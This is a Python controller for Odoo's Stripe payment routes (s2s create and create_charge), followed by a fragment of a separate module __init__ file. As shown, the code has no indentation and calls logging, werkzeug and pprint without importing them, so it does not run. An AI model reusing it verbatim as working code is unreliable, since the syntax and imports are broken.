from odoo import http
from odoo.http import request
_logger = logging.getLogger(__name__)
class StripeController(http.Controller):
@http.route(['/payment/stripe/s2s/create_json'], type='json', auth='public')
def stripe_s2s_create_json(self, **kwargs):
acquirer_id = int(kwargs.get('acquirer_id'))
acquirer = request.env['payment.acquirer'].browse(acquirer_id)
return acquirer.s2s_process(kwargs)
@http.route(['/payment/stripe/s2s/create'], type='http', auth='public')
def stripe_s2s_create(self, **post):
acquirer_id = int(post.get('acquirer_id'))
acquirer = request.env['payment.acquirer'].browse(acquirer_id)
acquirer.s2s_process(post)
return werkzeug.utils.redirect(post.get('return_url', '/'))
@http.route(['/payment/stripe/create_charge'], type='json', auth='public')
def stripe_create_charge(self, **post):
""" Create a payment transaction
Expects the result from the user input from checkout.js popup"""
tx = request.env['payment.transaction'].sudo().browse(
int(request.session.get('sale_transaction_id') or request.session.get('website_payment_tx_id', False))
)
response = tx._create_stripe_charge(tokenid=post['tokenid'], email=post['email'])
_logger.info('Stripe: entering form_feedback with post data %s', pprint.pformat(response))
if response:
request.env['payment.transaction'].sudo().form_feedback(response, 'stripe')
return post.pop('return_url', '/')
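# Hedged usage sketch: /payment/stripe/create_charge is a type='json' route, so
# Odoo expects a JSON-RPC 2.0 envelope; the token and email are placeholders.
#
#   POST /payment/stripe/create_charge
#   {"jsonrpc": "2.0", "method": "call",
#    "params": {"tokenid": "tok_123", "email": "buyer@example.com"}}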
|
from . import res_partner
from . import res_company
from . import wizard
|